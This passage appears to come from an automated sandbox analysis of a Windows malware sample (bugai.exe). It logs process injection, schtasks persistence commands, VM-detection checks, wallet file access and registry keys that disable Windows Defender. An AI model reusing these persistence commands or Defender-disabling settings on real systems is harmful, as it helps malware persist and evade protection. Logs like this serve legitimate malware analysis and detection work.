parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\105cab5e-fe13-4add-a906-7d615852a790.dmp"
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1180,3550293825060687371,12184495529520388009,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=F4BC1E2B47071A8878774764EE1D3A95 --mojo-platform-channel-handle=1192 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3128 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1120,15913329173901970198,6847747374331728254,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=D97D56E1CFE1EF76EC1E9FB189F19E23 --mojo-platform-channel-handle=1136 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2912 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1272,16880712170299029567,8661231629257431247,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=182E76C214089160938B9224E3187C07 --mojo-platform-channel-handle=1304 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2508 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eff1e8,0x7fef3eff1f8,0x7fef3eff208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2164 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1148,4935472589393101140,2835852930205234504,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=7ADC528C8DC568B68F6B639965851F2D --mojo-platform-channel-handle=1132 --ignored=" --type=renderer " /prefetch:2
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\560e8fa4-00d7-4f91-9040-d97eef083729.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\db44a753-a558-4425-b26d-ccd1fdec8b29.dmp"

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Appends a known multi-family ransomware file extension to files that have been encrypted (4 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\parent.lock
file	C:\Users\test22\AppData\Local\Temp\firefox\parent.lock

Resumed a suspended thread in a remote process potentially indicative of process injection (45 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2056 resumed a thread in remote process 2896
Process injection	Process 2056 resumed a thread in remote process 1064
Process injection	Process 2056 resumed a thread in remote process 3124
Process injection	Process 2056 resumed a thread in remote process 3404
Process injection	Process 2056 resumed a thread in remote process 3636
Process injection	Process 2056 resumed a thread in remote process 3824
Process injection	Process 1728 resumed a thread in remote process 1400
Process injection	Process 1964 resumed a thread in remote process 2260
Process injection	Process 2572 resumed a thread in remote process 2260
Process injection	Process 2900 resumed a thread in remote process 2896
Process injection	Process 3168 resumed a thread in remote process 1064
Process injection	Process 3428 resumed a thread in remote process 3124
Process injection	Process 3404 resumed a thread in remote process 3688
Process injection	Process 3636 resumed a thread in remote process 3856
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 2896	1	0	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 1064	1	0	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 3124	1	0	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 3404	1	0	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 3636	1	0	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002e0 suspend_count: 1 process_identifier: 3824	1	0	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 1400	1	0	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2260	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2260	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2260	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2260	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2260	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2260	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2260	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2896	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2896	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2896	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2896	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2896	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2896	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1064	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1064	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1064	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1064	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1064	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3124	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3124	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3124	1	0	0
NtResumeThread Feb. 16, 2024, 7:59 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3124	1	0	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 3688	1	0	0
NtResumeThread Feb. 16, 2024, 7:51 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 3856	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 ec 04 89 1c 24 54 5b exception.symbol: bugai+0x2db538 exception.instruction: in eax, dx exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2995512 exception.address: 0xecb538 registers.esp: 3341404 registers.edi: 6761879 registers.eax: 1447909480 registers.ebp: 4003897364 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 15490535 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (1 event)

registry

HKEY_CURRENT_USER\Software\Wine

Disables Windows Security features (16 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{3ECE7D3F-21D7-43D6-AE2F-B76F073DE82E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 172 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 16, 2024, 7:57 a.m.	thread_identifier: 2788 thread_handle: 0x0000019c process_identifier: 2784 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001b8	1	1
CreateProcessInternalW Feb. 16, 2024, 7:57 a.m.	thread_identifier: 2860 thread_handle: 0x000001c0 process_identifier: 2856 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001bc	1	1
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 1152 thread_handle: 0x000006ec process_identifier: 2056 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\orO_4WECHYgkaMJSLpQM.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\orO_4WECHYgkaMJSLpQM.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\orO_4WECHYgkaMJSLpQM.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006f0	1	1
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2620 thread_handle: 0x000006ec process_identifier: 2372 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\PXsW3OSySmisXJvS2lh2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\PXsW3OSySmisXJvS2lh2.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\PXsW3OSySmisXJvS2lh2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006e8	1	1
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 3000 thread_handle: 0x000006ec process_identifier: 2992 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\sbQkWyxbcah1ikaoMbtb.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\sbQkWyxbcah1ikaoMbtb.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\sbQkWyxbcah1ikaoMbtb.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006f4	1	1
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2308 thread_handle: 0x000006e8 process_identifier: 2300 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\6Lfr2_JvDPSQIOljUsEY.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\6Lfr2_JvDPSQIOljUsEY.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\6Lfr2_JvDPSQIOljUsEY.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006fc	1	1
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2084 thread_handle: 0x000006ec process_identifier: 1964 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\y2p55fFqEFlCcZ1qkquc.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\y2p55fFqEFlCcZ1qkquc.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\y2p55fFqEFlCcZ1qkquc.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006f8	1	1
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2120 thread_handle: 0x000001d4 process_identifier: 1728 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001d8	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 2056	1	0
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2912 thread_handle: 0x000002c4 process_identifier: 2896 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d0	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 2896	1	0
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 2164 thread_handle: 0x000002c4 process_identifier: 1064 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000144	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 1064	1	0
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 3128 thread_handle: 0x00000288 process_identifier: 3124 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000278	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 3124	1	0
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 3408 thread_handle: 0x000002ac process_identifier: 3404 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000254	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 3404	1	0
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 3640 thread_handle: 0x000002ac process_identifier: 3636 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 3636	1	0
CreateProcessInternalW Feb. 16, 2024, 7:58 a.m.	thread_identifier: 3828 thread_handle: 0x000002e0 process_identifier: 3824 current_directory: C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000288	1	1
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x000002e0 suspend_count: 1 process_identifier: 3824	1	0
NtResumeThread Feb. 16, 2024, 7:58 a.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 1728	1	0
